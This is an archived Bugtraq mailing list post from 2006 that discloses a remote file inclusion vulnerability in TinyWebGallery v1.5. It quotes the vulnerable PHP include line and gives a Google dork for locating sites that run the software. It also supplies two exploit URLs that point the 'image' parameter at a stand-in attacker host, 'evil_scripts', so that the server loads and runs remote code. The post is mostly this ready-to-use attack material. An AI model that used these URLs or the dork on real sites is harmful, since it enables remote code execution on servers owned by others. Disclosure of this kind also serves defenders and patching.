Bugtraq mailing list archives
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
From: x0r0n () hotmail com
Date: 10 Aug 2006 05:26:58 -0000
C Y B E R - W A R R i O R TIM TinyWebGallery v1.5 ( image ) Remote Include Vulnerability ------------------------------------------------------------------------------ Author: xoron ------------------------------------------------------------------------------ Script: TinyWebGallery ------------------------------------------------------------------------------ Class: Remote ------------------------------------------------------------------------------ cont@ct: x0r0n[at]hotmail[dot]com ------------------------------------------------------------------------------ CODE: <?php include ($image . ".txt"); ?> ------------------------------------------------------------------------------ google dork: "powered by twg" ------------------------------------------------------------------------------ Exploit: http://www.site.com/[path]/examples/image.php?image=http://evil_scripts http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts? ########################################################################### # # #Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends # # # ###########################################################################
Current thread:
- TinyWebGallery v1.5 ( image ) Remote Include Vulnerability x0r0n (Aug 10)
- <Possible follow-ups>
- Re: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability tinywebgallery (Aug 16)